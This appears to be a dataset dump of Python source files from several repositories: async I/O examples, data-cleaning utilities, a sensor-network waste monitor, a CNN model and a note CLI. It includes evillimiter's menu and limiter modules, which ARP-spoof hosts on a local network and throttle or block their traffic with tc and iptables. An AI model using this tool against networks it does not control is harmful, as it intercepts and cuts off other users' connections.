metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "A1Liu/boundio",
"score": 2
} |
#### File: boundio/examples/stdin_simple.py
```python
from boundio.examples.utils import get_example_code
source = get_example_code(__file__)
from boundio.stdin import stdin_stream
import boundio as bio
@bio.task() # Add task to task list
async def basic_echo():
async for line in stdin_stream():
line = line[:-1]
if line == 'quit': break
print(line)
if __name__ == '__main__':
bio.run_tasks()
else:
bio.clear_tasks()
```
#### File: boundio/examples/utils.py
```python
import re
beginning = re.compile(r'^[\s\S]+?\n\n')
def get_example_code(path): # Remove the section that gets the example code as an attribute from the example itself.
with open(path,'r') as f:
txt = f.read()
return beginning.sub('',txt)
```
#### File: boundio/boundio/item_codes.py
```python
class ITEM_CODE():
def __init__( self,name ):
self.name = name
def __str__(self):
return ''
# Go to on_close
class CLOSE_STREAM(ITEM_CODE):
def __init__(self, frame):
super(CLOSE_STREAM,self).__init__("boundio.item_codes.CLOSE_SOCKET")
self.frame = frame
def __str__(self):
return str(self.frame)
# Don't yield this item
SKIP_ITEM = ITEM_CODE("boundio.item_codes.SKIP_ITEM")
# Directly return
END_IO = CLOSE_STREAM('')
END_IO.name = "boundio.item_codes.END_IO"
```
#### File: boundio/sockets/utils.py
```python
import websockets
# Put each frame in its own line for easier processing
def process_frame(socket,frame):
return "{}\n".format( frame.strip().replace( '\n','' ) )
``` |
{
"source": "A1Liu/pytill",
"score": 2
} |
#### File: aliu/debug/__init__.py
```python
from aliu.debug.placeholder import Placeholder
from aliu.debug.debug import *
def add_placeholder(obj, attribute):
# Usage:
# remove_placeholder = add_placeholder(my_object, 'my_object_attribute')
# # Do something with the object
# remove_placeholder()
origin = getattr(obj, attribute)
placeholder = Placeholder(origin)
setattr(obj, attribute, placeholder)
return lambda: setattr(obj, attribute, origin)
```
#### File: utils/data/count_entries.py
```python
def count_entries(df, col_name):
"""Return a dictionary with counts of
occurrences as value for each key."""
counts = {}
col = df[col_name]
for entry in col:
if entry in counts.keys():
counts[entry]+=1
else:
counts[entry]=1
return counts
import pandas as pd
def count_entries_csv(csv_file, col_name, chunksize = 10):
"""Return a dictionary with counts of
occurrences as value for each key."""
counts = {}
for chunk in pd.read_csv(csv_file, chunksize = 10):
counts.update(count_entries(chunk, col_name))
return counts
```
#### File: data/mr_clean0/mr_clean_func_utils.py
```python
import numpy as np
import pandas as pd
def coerce(df,column, coerce):
df[column] = coerce
def row_req(df,cutoff):
return rows(df) * cutoff
def rows(df):
return df.shape[0]
def is_num(series):
if (series.dtype == np.float64 or series.dtype == np.int64):
return True
return False
def get_cutoff(column, cutoff):
__value_or_container(column,cutoff,1)
def get_colname_gen(df):
def colname_gen(col_name = 'mrClean'):
assert type(df) is pd.DataFrame
id_string = col_name
if id_string not in df.keys():
yield id_string
id_number = 0
while True:
id_string = col_name + str(id_number)
if id_string in df.keys():
id_number+=1
else:
yield id_string
return colname_gen
def bc_vec(df,value = True): # Boolean column vector
return np.ones(rows(df),dtype=bool) if value else np.zeros(rows(df),dtype=bool)
def ic_vec(df,value = 0): # Boolean column vector
if value == 0:
return np.zeros(rows(df),dtype=np.int32)
elif value == 1:
return np.ones(rows(df),dtype=np.int32)
else:
return np.ones(rows(df),dtype=np.int32) * value
def __value_or_container(key,item,default):
if type(item) is dict:
return item[key] if key in item else default
return item
```
#### File: data/mr_clean0/mr_clean_print_utils.py
```python
import shutil
# Simple statement of memory usage
def memory_statement(savings,task_name,statement):
return statement \
.format( convert_memory(savings) ,task_name )
# Convert memeory to a readable form
def convert_memory(memory_value):
unit_list = ['KB','MB','GB','TB']
index = 0
memory = memory_value / 1024
while memory > 1000 and index < 3:
memory/=1024
index+=1
return '{} {}'.format(round( memory, 1),unit_list[index])
def title_line(text):
"""Returns a string that represents the
text as a title blurb
"""
columns = shutil.get_terminal_size()[0]
start = columns // 2 - len(text) // 2
output = '='*columns + '\n\n' + \
' ' * start + str(text) + "\n\n" + \
'='*columns + '\n'
return output
# Outputs to a file. If and only if ouput_safe is false, it will overwrite existing files
def output_to_file(df,output_file,output_safe):
try:
with open(output_file,'x' if output_safe else 'w') as file:
file.write(df)
except FileExistsError:
print("Nothing outputted: file '{}' already exists".format(output_file))
```
#### File: data/mr_clean0/mr_clean.py
```python
from mr_clean_functions import coerce_col,preview,remove_whitespace, \
rename_cols,rename_index,scrub_str_cols,validate
from mr_clean_print_utils import convert_memory,memory_statement,output_to_file,title_line
#This method takes in a DataFrame object, as well as a few parameters,
# and outputs a cleaned DataFrame. It operates under a few basic assumptions,
# so it can't do everything lol
def clean(df, settings = None, col_names = None,handle_na = None,
char_scrub = True, char_scrub_cutoff = .99, scrub_ignore = [],
numeric_cutoff = .95, coerce_numeric = [],
dt_cutoff = .99, coerce_dt = [], dt_format = None,
categorical_cutoff = .60,coerce_categorical = [],
display_preview = True, preview_rows = 5, preview_max_cols = 0,
output_file = None,output_safe = True):
# Error Trap inputs
validate(df,coerce_numeric,coerce_dt,coerce_categorical)
def memory_change(task_name = None): # Returns a memory statement and resets memory
nonlocal df_memory, df
savings = df_memory - reset_mem()
if task_name is not None:
if savings > 0:
return memory_statement(savings,task_name,'Saved {} after {}\n')
else:
return memory_statement(-savings,task_name,"Size grew by {} after {}\n")
def memory(column = None):# Returns the memory of the dataframe
nonlocal df
if column is None:
return df.memory_usage(deep=True)
else:
return df[column].memory_usage(deep=True)
def reset_mem():# Resets memory value
nonlocal df_memory
df_memory = memory().sum()
return df_memory
# Make a copy of the inputted DataFrame
old_df = df
df = df.copy()
begin_df_memory = memory().sum()
df_memory = begin_df_memory
# ------TASK 1: Remove Columns-----------
# ------TASK 1: CHANGE COLNAMES----------
print('Renaming columns...')
rename_cols(df,col_names)
# ------TASK 2: REMOVE WHITESPACE--------
print('Checking for extra whitespace...')
col_mem = memory()
for savings,column in ((col_mem[column]-memory(column),column)
for column in remove_whitespace(df) if col_mem[column]-memory(column) > 0):
print( memory_statement(savings,
"removing extra whitespace from column '{}'" \
.format(column)))
print(memory_change('removing whitespace'))
# ------TASK 3: REFORMAT INDEX-----------
if rename_index(df):
print('Changing unhelpful index and adding it as column')
print(memory_change('adding a column'))
# Try to remove characters from beginning and end of columns
# ------TASK 3: DEEP CLEAN---------------
if char_scrub:
print('Trying character scrub...')
for result in ( scrub_str_cols( df,column, char_scrub_cutoff )
for column in df if column not in scrub_ignore ):
print( ("Scrubbed '{}' from the front and '{}' from the back of column '{}', \n\t" \
"and stored the scrub depths to columns '{}' and '{}' respectively.") \
.format(*result)) if result is not None else None
print(memory_change('character scrubbing'))
# ------TASK 4: Coerce data types--------
col_mem = memory()
print('Trying to coerce column values...')
for column in df:
if coerce_col(df,column,
numeric_cutoff, coerce_numeric,
dt_cutoff, coerce_dt, dt_format,
categorical_cutoff,coerce_categorical):
print( memory_statement( col_mem[column]-memory(column),
"coercing column '{}' to dtype '{}'" \
.format(column,df[column].dtype) ) )
print(memory_change('coercing columns to specialized data-types'))
# ------TASK 5: Combine columns that are correlated
# lossless 'compression' and lossy 'compression'
# ------TASK 4: Fill missing values------
#
# ------TASK 6:
# ------TASK 7:
# ------TASK 8:
# ------TASK 9:
# Handle missing values
# Do melts and pivots (If necessary)
# I'll do this when I have a better grasp of the intuition that's used to
# Determine when a pivot or melt is necessary. For now this is just a comment (and a dream)
# Print what was done
print(title_line('SUMMARY'))
# Compare column names
print("Comparison of Column Names: \n\n{}\n{}\n\n".format(old_df.columns,df.columns))
# Compare column data types
# Comare previews of data
if display_preview:
print('Visual Comparison of DataFrames:\n')
print(preview(old_df,preview_rows, preview_max_cols))
print()
print(preview(df,preview_rows, preview_max_cols))
print('\n')
print('Memory Usage:\n')
print('Initial data size in memory: {}'.format( convert_memory(begin_df_memory) ))
print(' Final data size in memory: {}'.format( convert_memory(memory().sum()) ))
print(' Change: {}'.format( convert_memory(memory().sum()-begin_df_memory) ))
if output_file is None:
return df
else:
output_to_file(df,output_file, output_safe)
```
#### File: utils/io/Format.py
```python
def isNumber(number):
if isinstance(number, float):
return True
try:
float(expression);return True
except:
return False
``` |
{
"source": "A1manac/evillimiter",
"score": 2
} |
#### File: evillimiter/menus/main_menu.py
```python
import socket
import netaddr
import collections
from terminaltables import SingleTable
import evillimiter.networking.utils as netutils
from .menu import CommandMenu
from evillimiter.console.io import IO
from evillimiter.console.banner import get_main_banner
from evillimiter.networking.host import Host
from evillimiter.networking.limiter import Limiter
from evillimiter.networking.spoof import ARPSpoofer
from evillimiter.networking.scan import HostScanner
class MainMenu(CommandMenu):
def __init__(self, version, interface, gateway_ip, gateway_mac, netmask):
super().__init__()
self.prompt = '({}Main{}) >>> '.format(IO.Style.BRIGHT, IO.Style.RESET_ALL)
self.parser.add_subparser('hosts', self._hosts_handler)
self.parser.add_subparser('clear', self._clear_handler)
scan_parser = self.parser.add_subparser('scan', self._scan_handler)
scan_parser.add_parameterized_flag('--range', 'iprange')
limit_parser = self.parser.add_subparser('limit', self._limit_handler)
limit_parser.add_parameter('id')
limit_parser.add_parameter('rate')
block_parser = self.parser.add_subparser('block', self._block_handler)
block_parser.add_parameter('id')
free_parser = self.parser.add_subparser('free', self._free_handler)
free_parser.add_parameter('id')
add_parser = self.parser.add_subparser('add', self._add_handler)
add_parser.add_parameter('ip')
add_parser.add_parameterized_flag('--mac', 'mac')
self.parser.add_subparser('help', self._help_handler)
self.parser.add_subparser('?', self._help_handler)
self.parser.add_subparser('quit', self._quit_handler)
self.parser.add_subparser('exit', self._quit_handler)
self.version = version # application version
self.interface = interface # specified IPv4 interface
self.gateway_ip = gateway_ip
self.gateway_mac = gateway_mac
self.netmask = netmask
# range of IP address calculated from gateway IP and netmask
self.iprange = list(netaddr.IPNetwork('{}/{}'.format(self.gateway_ip, self.netmask)))
self.host_scanner = HostScanner(self.interface, self.iprange)
self.arp_spoofer = ARPSpoofer(self.interface, self.gateway_ip, self.gateway_mac)
self.limiter = Limiter(self.interface)
# holds discovered hosts
self.hosts = []
self._print_help_reminder()
# start the spoof thread
self.arp_spoofer.start()
def interrupt_handler(self, ctrl_c=True):
if ctrl_c:
IO.spacer()
IO.ok('cleaning up... stand by...')
self.arp_spoofer.stop()
for host in self.hosts:
self._free_host(host)
def _scan_handler(self, args):
"""
Handles 'scan' command-line argument
(Re)scans for hosts on the network
"""
if args.iprange:
try:
if '-' in args.iprange:
iprange = list(netaddr.iter_iprange(*args.iprange.split('-')))
else:
iprange = list(netaddr.IPNetwork(args.iprange))
except netaddr.core.AddrFormatError:
IO.error('ip range invalid.')
return
else:
iprange = None
for host in self.hosts:
self._free_host(host)
IO.spacer()
self.hosts = self.host_scanner.scan(iprange)
IO.ok('{}{}{} hosts discovered.'.format(IO.Fore.LIGHTYELLOW_EX, len(self.hosts), IO.Style.RESET_ALL))
IO.spacer()
def _hosts_handler(self, args):
"""
Handles 'hosts' command-line argument
Displays discovered hosts
"""
table_data = [[
'{}ID{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}IP-Address{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}MAC-Address{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}Hostname{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}Status{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL)
]]
for i, host in enumerate(self.hosts):
table_data.append([
'{}{}{}'.format(IO.Fore.LIGHTYELLOW_EX, i, IO.Style.RESET_ALL),
host.ip,
host.mac,
host.name if host.name is not None else '',
host.pretty_status()
])
table = SingleTable(table_data, 'Hosts')
if not table.ok:
IO.error('table does not fit terminal. resize or decrease font size.')
return
IO.spacer()
IO.print(table.table)
IO.spacer()
def _limit_handler(self, args):
"""
Handles 'limit' command-line argument
Limits bandwith of host to specified rate
"""
hosts = self._get_hosts_by_ids(args.id)
rate = args.rate
if hosts is not None and len(hosts) > 0:
for host in hosts:
if not host.spoofed:
self.arp_spoofer.add(host)
if netutils.validate_netrate_string(rate):
self.limiter.limit(host, rate)
else:
IO.error('limit rate is invalid.')
return
IO.ok('{}{}{} limited{} to {}.'.format(IO.Fore.LIGHTYELLOW_EX, host.ip, IO.Fore.LIGHTRED_EX, IO.Style.RESET_ALL, rate))
def _block_handler(self, args):
"""
Handles 'block' command-line argument
Blocks internet communication for host
"""
hosts = self._get_hosts_by_ids(args.id)
if hosts is not None and len(hosts) > 0:
for host in hosts:
if not host.spoofed:
self.arp_spoofer.add(host)
self.limiter.block(host)
IO.ok('{}{}{} blocked{}.'.format(IO.Fore.LIGHTYELLOW_EX, host.ip, IO.Fore.RED, IO.Style.RESET_ALL))
def _free_handler(self, args):
"""
Handles 'free' command-line argument
Frees the host from all limitations
"""
hosts = self._get_hosts_by_ids(args.id)
if hosts is not None and len(hosts) > 0:
for host in hosts:
self._free_host(host)
def _add_handler(self, args):
"""
Handles 'add' command-line argument
Adds custom host to host list
"""
ip = args.ip
if not netutils.validate_ip_address(ip):
IO.error('invalid ip address.')
return
if args.mac:
mac = args.mac
if not netutils.validate_mac_address(mac):
IO.error('invalid mac address.')
return
else:
mac = netutils.get_mac_by_ip(self.interface, ip)
if mac is None:
IO.error('unable to resolve mac address. specify manually (--mac).')
return
name = None
try:
host_info = socket.gethostbyaddr(ip)
name = None if host_info is None else host_info[0]
except socket.herror:
pass
host = Host(ip, mac, name)
if host in self.hosts:
IO.error('host does already exist.')
return
self.hosts.append(host)
IO.ok('host added.')
def _clear_handler(self, args):
"""
Handler for the 'clear' command-line argument
Clears the terminal window and re-prints the banner
"""
IO.clear()
IO.print(get_main_banner(self.version))
self._print_help_reminder()
def _help_handler(self, args):
"""
Handles 'help' command-line argument
Prints help message including commands and usage
"""
spaces = ' ' * 30
IO.print(
"""
{y}scan (--range [IP range]){r}{}scans for online hosts on your network.
{s}required to find the hosts you want to limit.
{b}{s}e.g.: scan
{s} scan --range 192.168.178.1-192.168.178.50
{s} scan --range 192.168.178.1/24{r}
{y}hosts{r}{}lists all scanned hosts.
{s}contains host information, including IDs.
{y}limit [ID1,ID2,...] [rate]{r}{}limits bandwith of host(s) (uload/dload).
{b}{s}e.g.: limit 4 100kbit
{s} limit 2,3,4 1gbit
{s} limit all 200kbit{r}
{y}block [ID1,ID2,...]{r}{}blocks internet access of host(s).
{b}{s}e.g.: block 3,2
{s} block all{r}
{y}free [ID1,ID2,...]{r}{}unlimits/unblocks host(s).
{b}{s}e.g.: free 3
{s} free all{r}
{y}add [IP] (--mac [MAC]){r}{}adds custom host to host list.
{s}mac resolved automatically.
{b}{s}e.g.: add 192.168.178.24
{s} add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37{r}
{y}clear{r}{}clears the terminal window.
{y}quit{r}{}quits the application.
""".format(
spaces[len('scan (--range [IP range])'):],
spaces[len('hosts'):],
spaces[len('limit [ID1,ID2,...] [rate]'):],
spaces[len('block [ID1,ID2,...]'):],
spaces[len('free [ID1,ID2,...]'):],
spaces[len('add [IP] (--mac [MAC])'):],
spaces[len('clear'):],
spaces[len('quit'):],
y=IO.Fore.LIGHTYELLOW_EX, r=IO.Style.RESET_ALL, b=IO.Style.BRIGHT,
s=spaces
)
)
def _quit_handler(self, args):
self.interrupt_handler(False)
self.stop()
def _print_help_reminder(self):
IO.print('type {Y}help{R} or {Y}?{R} to show command information.'.format(Y=IO.Fore.LIGHTYELLOW_EX, R=IO.Style.RESET_ALL))
def _get_hosts_by_ids(self, ids_string):
if ids_string == 'all':
return self.hosts.copy()
try:
ids = [int(x) for x in ids_string.split(',')]
except ValueError:
IO.error('\'{}\' are invalid IDs.'.format(ids_string))
return
hosts = []
for id_ in ids:
if len(self.hosts) == 0 or id_ not in range(len(self.hosts)):
IO.error('no host with id {}{}{}.'.format(IO.Fore.LIGHTYELLOW_EX, id_, IO.Style.RESET_ALL))
return
if self.hosts[id_] not in hosts:
hosts.append(self.hosts[id_])
return hosts
def _free_host(self, host):
"""
Stops ARP spoofing and unlimits host
"""
if host.spoofed:
self.arp_spoofer.remove(host)
self.limiter.unlimit(host)
IO.ok('{}{}{} freed.'.format(IO.Fore.LIGHTYELLOW_EX, host.ip, IO.Style.RESET_ALL))
```
#### File: evillimiter/networking/limiter.py
```python
import evillimiter.console.shell as shell
from .host import Host
from evillimiter.common.globals import BIN_TC, BIN_IPTABLES
class Limiter(object):
def __init__(self, interface):
self.interface = interface
# maps an ID to each host to destinguish between the forwarded packets
self.host_id_map = {}
def limit(self, host: Host, rate):
"""
Limits the uload/dload traffic of a host
to a specified rate
"""
id_ = self._create_id()
if host in self.host_id_map:
id_ = self.host_id_map[host]
self.unlimit(host)
# add a class to the root qdisc with specified rate
shell.execute_suppressed('{} class add dev {} parent 1:0 classid 1:{} htb rate {r} ceil {r}'.format(BIN_TC, self.interface, id_, r=rate))
# add a fw filter that filters packets marked with the corresponding ID
shell.execute_suppressed('{} filter add dev {} parent 1:0 protocol ip prio {id} handle {id} fw flowid 1:{id}'.format(BIN_TC, self.interface, id=id_))
# marks outgoing packets
shell.execute_suppressed('{} -t mangle -A POSTROUTING -s {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
# marks incoming packets
shell.execute_suppressed('{} -t mangle -A PREROUTING -d {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
self.host_id_map[host] = id_
host.limited = True
def block(self, host):
id_ = self._create_id()
if host in self.host_id_map:
id_ = self.host_id_map[host]
self.unlimit(host)
# drops forwarded packets with matching source
shell.execute_suppressed('{} -t filter -A FORWARD -s {} -j DROP'.format(BIN_IPTABLES, host.ip))
# drops forwarded packets with matching destination
shell.execute_suppressed('{} -t filter -A FORWARD -d {} -j DROP'.format(BIN_IPTABLES, host.ip))
self.host_id_map[host] = id_
host.blocked = True
def unlimit(self, host):
id_ = self.host_id_map[host]
self._delete_tc_class(id_)
self._delete_iptables_entries(host, id_)
del self.host_id_map[host]
host.limited = False
host.blocked = False
def _create_id(self):
"""
Returns a unique ID that is
currently not in use
"""
id_ = 1
while True:
if id_ not in self.host_id_map.values():
return id_
id_ += 1
def _delete_tc_class(self, id_):
"""
Deletes the tc class and applied filters
for a given ID (host)
"""
shell.execute_suppressed('{} filter del dev {} parent 1:0 prio {}'.format(BIN_TC, self.interface, id_))
shell.execute_suppressed('{} class del dev {} parent 1:0 classid 1:{}'.format(BIN_TC, self.interface, id_))
def _delete_iptables_entries(self, host: Host, id_):
"""
Deletes iptables rules for a given ID (host)
"""
shell.execute_suppressed('{} -t mangle -D POSTROUTING -s {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
shell.execute_suppressed('{} -t mangle -D PREROUTING -d {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
shell.execute_suppressed('{} -t filter -D FORWARD -s {} -j DROP'.format(BIN_IPTABLES, host.ip))
shell.execute_suppressed('{} -t filter -D FORWARD -d {} -j DROP'.format(BIN_IPTABLES, host.ip))
``` |
{
"source": "a1p4ca/slvn-cc",
"score": 2
} |
#### File: a1p4ca/slvn-cc/app.py
```python
from flask import Flask, jsonify, request, render_template
from sds011 import SDS011
import os
import time
# dust_sensor = SDS011('COM7')
app = Flask(__name__)
# dust_sensor.sleep(sleep=False)
@app.route("/")
def main():
return render_template('index.html')
@app.route('/api', methods=['GET'])
def status():
# dust = dust_sensor.query()
dust = ['45', '59']
return jsonify({
'pm10': dust[0],
'pm25': dust[1]
})
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "A1phaMark/Waste-Management-System",
"score": 3
} |
#### File: A1phaMark/Waste-Management-System/head_node.py
```python
import socket
import sys
import time
# node file
server_address=('10.0.0.157', 8080) # head node address
sensor_address = [('10.0.0.22', 8080)] # a list of all sensor addresses
last_lev = 0
last_time = time.time()
############## update to the server####################################
def _update(pack):
try:
print("Sending update now...")
print("Trying to connect with TCP server...")
ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ts.connect(("TCP server IP", 80))
ack = ts.recv(1024)
print("Connection with server success! Sending data now...")
print(ack.decode("utf-8"))
ts.send(pack.encode('utf-8'))
mess = ts.recv(1024)
print(mess.decode("utf-8"))
print("Data Transfer finished! Now go to sleep...")
ts.close()
return 1
except:
print("Cannot connect to TCP server, go to sleep and wait for next data transfer...")
return 0
############# make the packet ################################################################
def make_pack(data):
data = str(data)
device_name = 'id001' # represent trash can id
t = time.strftime('%Y-%m-%d %H:%M:%S')
pak = data + ', ' + device_name + ', ' + t
return pak
############ main ##############################################################
while 1:
data = 0
sensor_count = 0
for addr in sensor_address:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(server_address)
# sending request to sensor
message = '1'
print("Trying to send to sensor", sensor_count+1, "...")
s.sendto(message.encode('utf-8'), addr)
# receive packet from sensor
reply = s.recvfrom(1024)
print(reply)
temp = reply[0]
data += float(temp.decode('utf-8'))
print("Received data from sensor, sending a reply...")
# sending reply to inform sensor that the packet is received
message = '0'
s.sendto(message.encode('utf-8'), addr)
print("Reply sent")
sensor_count+=1
except:
print("An error occur while trying to get data from sensor...")
print('')
print("Received data from all sensors, processing data now...")
try:
current_lev = data/sensor_count
# in our test, we made the interval much smaller
if current_lev < 0.5:
interval = 7200
elif current_lev >= 0.8:
interval = 1800
else:
interval = 3600
timer = time.time()
timer-= last_time
if timer >= interval:
#make the data packet
pack = make_pack(current_lev)
# Update to server complete
if _update(pack) == 1:
last_time = time.time() # reset timer
last_lev = current_lev # update last level
# update to server failed
else:
last_lev = current_lev
else:
change_lev = current_lev - last_lev
# check if the load changes a lot in a short period of time
if change_lev >= 0.25:
# make the data packet
pack = make_pack(current_lev)
if _update(pack) == 1:
last_time = time.time()
last_lev = current_lev
else:
last_lev = current_lev
else:
print("No need to send update now, go to sleep...")
last_lev = current_lev
except:
print("Error occured while processing the data")
print("----------------------------------------------------------------", '\n')
time.sleep(10)
```
#### File: A1phaMark/Waste-Management-System/sensor.py
```python
import time
import socket
import RPi.GPIO as GPIO
def perform_reading():
GPIO.setmode(GPIO.BCM)
TRIG = 23
ECHO = 24
GPIO.setup(TRIG, GPIO.OUT)
GPIO.setup(ECHO, GPIO.IN)
GPIO.output(TRIG, False)
time.sleep(2)
GPIO.output(TRIG, True)
time.sleep(.00001)
GPIO.output(TRIG, False)
# record the time duration GPIO.input is set to 1
while GPIO.input(ECHO) == 0:
pulse_start = time.time()
while GPIO.input(ECHO) == 1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
# calculate distance by (time*velocity)/2
distance = pulse_duration * 17150
distance = round(distance, 2)
GPIO.cleanup()
print("distance recorded: " + str(distance))
current_lev = 1 - (distance/std_height)
current_lev = round(current_lev, 4)
return current_lev
BUFFER_SIZE = 1024
std_height = 80 #Length of trash bin in cm
address = ('10.0.0.22', 8080)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(address)
while 1:
try:
print("Waiting for packet...")
mess = s.recvfrom(1024)
print(mess)
send_addr = mess[1]
# message = 1 means the Node tells the sensor to send a reading
if mess[0].decode('utf-8') == '1':
print("Receive request from head node, its time to perform a measurement!!")
# perfrom a reading
data = perform_reading()
data = str(data).encode('utf-8')
# send data to the head node
s.sendto(data, send_addr)
# message = 0 means the Node has received the data
if mess[0].decode('utf-8') == '0':
print("Head node has received my data, its time to sleep~~",'\n')
time.sleep(100)
except:
time.sleep(100)
``` |
{
"source": "a1pha/mesa-cnn",
"score": 3
} |
#### File: a1pha/mesa-cnn/model.py
```python
from __future__ import print_function
import tensorflow as tf
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from data_processing import filter_activity, get_activity
import pickle
# Helper Method to Parse Mesa File Paths into Actigraphy Vectors
def process_input(key_np_array):
keys_processed = np.empty([key_np_array.size, 14400])
i = 0
for patient in key_np_array:
keys_processed[i] = filter_activity(get_activity(patient))
i += 1
return keys_processed
# Loading the data
with open('data_dict.pickle', 'rb') as read:
data_dict = pickle.load(read)
labels = (np.array(list(data_dict.values()))).astype(int)
unprocessed_input = np.array(list(data_dict.keys()))
# Splitting the data into training and test
X_train, X_test, y_train, y_test = train_test_split(unprocessed_input, labels, test_size=0.20, random_state=42)
# Converting labels to one-hot vectors
y_train = tf.keras.utils.to_categorical(y_train, num_classes=25)
y_test = tf.keras.utils.to_categorical(y_test, num_classes=25)
# Training Parameters
batch_size = 50
learning_rate = 0.01
epochs = 5
num_steps = X_train.size//batch_size
# Network Parameters
num_input = 14400
num_classes = 25
dropout = 0.75
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='VALID')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def conv1d(x, W, b, stride=1):
x = tf.nn.conv1d(x, W, stride=stride, padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool1d(x, k=5):
return tf.nn.pool(x, [k], 'MAX', 'SAME', strides=[k])
# Store layers weight & bias
weights = {
# 10x1 conv, 1 input, 10 outputs
'wc1': tf.Variable(tf.random_normal([10, 1, 10])),
# conv, 32 inputs, 64 outputs
'wc2': tf.Variable(tf.random_normal([5, 5, 10, 20])),
# fully connected, 7*7*64 inputs, 1024 outputs
'wd1': tf.Variable(tf.random_normal([2300, 1024])),
# 1024 inputs, 10 outputs (class prediction)
'out': tf.Variable(tf.random_normal([1024, num_classes]))
}
biases = {
'bc1': tf.Variable(tf.random_normal([10])),
'bc2': tf.Variable(tf.random_normal([20])),
'bd1': tf.Variable(tf.random_normal([1024])),
'out': tf.Variable(tf.random_normal([num_classes]))
}
# tf Graph input
X = tf.placeholder(tf.float32, [None, num_input])
Y = tf.placeholder(tf.float32, [None, num_classes])
keep_prob = tf.placeholder(tf.float32) # dropout (keep probability)
# Define Model
def conv_net(x, weights, biases, dropout):
# Reshaping inputs into proper shape
x = tf.reshape(x, shape=[-1, 14400, 1])
# First Convolutional Layer
conv1 = tf.nn.relu(conv1d(x, weights['wc1'], biases['bc1'], stride=1))
conv1 = maxpool1d(conv1, k=5)
# Reshaping for 2D Convolutions
conv1_reshaped = tf.reshape(conv1, shape=[-1, 5, 576, 10])
# Second Convolutional Layer
conv2 = tf.nn.relu(conv2d(conv1_reshaped, weights['wc2'], biases['bc2'], strides=1))
conv2 = tf.squeeze(conv2, axis=1)
conv2 = maxpool1d(conv2, k=5)
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc1 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])
fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
fc1 = tf.nn.dropout(fc1, dropout)
# Output, class prediction
out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])
return out
# Construct model
logits = conv_net(X, weights, biases, keep_prob)
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
logits=logits, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# Initialize the variables (i.e. assign their default value)
init = tf.global_variables_initializer()
# Start training
with tf.Session() as sess:
# Run the initializer
sess.run(init)
indices = np.arange(1, X_train.size)
for epoch in range(epochs+1):
indices = shuffle(indices)
epoch_loss = 0
i = 0
while i < (len(X_train) - batch_size):
batch = np.random.choice(indices, size=batch_size)
batch_x = process_input(np.take(X_train, batch))
batch_y = np.take(y_train, batch, axis=0)
sess.run(train_op, feed_dict={X: batch_x, Y: batch_y, keep_prob: 0.8})
loss, acc = sess.run([loss_op, accuracy], feed_dict={X: batch_x, Y: batch_y, keep_prob: 1.0})
print("Minibatch Loss= " + \
"{:.4f}".format(loss) + ", Training Accuracy= " + \
"{:.3f}".format(acc))
i += batch_size
print(str(i) + " Samples Processed")
print("Epoch " + str(epoch+1) + " Completed")
print("Testing Accuracy:", sess.run(accuracy, feed_dict={X: process_input(X_test),
Y: y_test,
keep_prob: 1.0}))
``` |
{
"source": "a1phat0ny/noteboard",
"score": 3
} |
#### File: noteboard/noteboard/cli.py
```python
import argparse
import sys
import os
import re
import shlex
import logging
from colorama import init, deinit, Fore, Back, Style
from . import DEFAULT_BOARD, TAGS
from .__version__ import __version__
from .storage import Storage, History, NoteboardException
from .utils import time_diff, add_date, to_timestamp, to_datetime
logger = logging.getLogger("noteboard")
COLORS = {
"add": "GREEN",
"remove": "LIGHTMAGENTA_EX",
"clear": "RED",
"run": "BLUE",
"tick": "GREEN",
"mark": "YELLOW",
"star": "YELLOW",
"tag": "LIGHTBLUE_EX",
"untick": "GREEN",
"unmark": "YELLOW",
"unstar": "YELLOW",
"untag": "LIGHTBLUE_EX",
"due": "LIGHTBLUE_EX",
"edit": "LIGHTCYAN_EX",
"move": "LIGHTCYAN_EX",
"rename": "LIGHTCYAN_EX",
"undo": "LIGHTCYAN_EX",
"import": "",
"export": "",
}
def p(*args, **kwargs):
print(" ", *args, **kwargs)
def error_print(text):
print(Style.BRIGHT + Fore.LIGHTRED_EX + "✘ " + text)
def get_fore_color(action):
color = COLORS.get(action, "")
if color == "":
return ""
return eval("Fore." + color)
def get_back_color(action):
color = COLORS.get(action, "")
if color == "":
return Back.LIGHTWHITE_EX
return eval("Back." + color)
def print_footer():
with Storage() as s:
shelf = dict(s.shelf)
ticks = 0
marks = 0
stars = 0
for board in shelf:
for item in shelf[board]:
if item["tick"] is True:
ticks += 1
if item["mark"] is True:
marks += 1
if item["star"] is True:
stars += 1
